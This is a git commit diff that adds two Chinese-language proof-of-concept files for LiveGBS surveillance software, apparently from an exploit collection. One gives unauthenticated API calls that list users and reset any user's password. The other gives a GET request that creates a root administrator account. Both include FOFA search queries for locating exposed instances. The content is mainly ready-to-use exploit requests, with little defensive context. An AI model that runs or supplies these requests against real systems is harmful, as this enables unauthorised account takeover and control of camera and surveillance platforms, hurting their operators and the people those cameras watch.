整理文件

2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
--- a/LiveGBS/LiveGBS任意用户密码重置漏洞.md
+++ b/LiveGBS/LiveGBS任意用户密码重置漏洞.md
@@ -0,0 +1,33 @@
+# LiveGBS任意用户密码重置漏洞
+
+LiveGBS部分接口存在未授权访问导致，可以通过组合漏洞修改任意用户密码
+
+## fofa
+
+```yaml
+icon_hash="-206100324"
+```
+
+## poc
+
+### 获取用户id
+
+```
+/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
+```
+
+![image-20240820155005009](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550568.png)
+
+### 通过id更改用户密码
+
+```
+/api/v1/user/resetpassword?id=22&password=123456
+```
+
+![image-20240820155041297](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550695.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ
--- a/LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md
+++ b/LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md
@@ -0,0 +1,18 @@
+## LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)
+
+## fofa
+```
+icon_hash="-206100324"
+```
+
+
+## poc
+```
+GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Connection: close
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/c77b5b4e-f3c0-4653-82a6-ebd9756f431e)